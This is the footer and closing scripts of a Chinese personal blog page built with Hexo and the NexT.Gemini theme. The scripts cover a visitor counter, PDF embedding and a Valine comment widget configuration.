  &copy; 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">blueSatchel</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>

<script src="/js/bookmark.js"></script>




  




  
<script src="/js/local-search.js"></script>









<script>
document.querySelectorAll('.pdfobject-container').forEach(element => {
  let url = element.dataset.target;
  let pdfOpenParams = {
    navpanes : 0,
    toolbar  : 0,
    statusbar: 0,
    pagemode : 'thumbs',
    view     : 'FitH'
  };
  let pdfOpenFragment = '#' + Object.entries(pdfOpenParams).map(([key, value]) => `${key}=${encodeURIComponent(value)}`).join('&');
  let fullURL = `/lib/pdf/web/viewer.html?file=${encodeURIComponent(url)}${pdfOpenFragment}`;

  if (NexT.utils.supportsPDFs()) {
    element.innerHTML = `<embed class="pdfobject" src="${url + pdfOpenFragment}" type="application/pdf" style="height: ${element.dataset.height};">`;
  } else {
    element.innerHTML = `<iframe src="${fullURL}" style="height: ${element.dataset.height};" frameborder="0"></iframe>`;
  }
});
</script>




  

  


<script>
NexT.utils.loadComments(document.querySelector('#valine-comments'), () => {
  NexT.utils.getScript('//unpkg.com/valine/dist/Valine.min.js', () => {
    var GUEST = ['nick', 'mail', 'link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item => {
      return GUEST.includes(item);
    });
    new Valine({
      el         : '#valine-comments',
      verify     : false,
      notify     : false,
      appId      : 'Aps2pGDp4GmAT5ebqUw6RUat-gzGzoHsz',
      appKey     : 'mikzA3qOg4gHjM10U4N8h52T',
      placeholder: "来说两句吧呜呜呜",
      avatar     : 'mm',
      meta       : guest,
      pageSize   : '10' || 10,
      visitor    : true,
      lang       : '' || 'zh-cn',
      path       : location.pathname,
      recordIP   : true,
      serverURLs : ''
    });
  }, window.Valine);
});
</script>

</body>
</html>
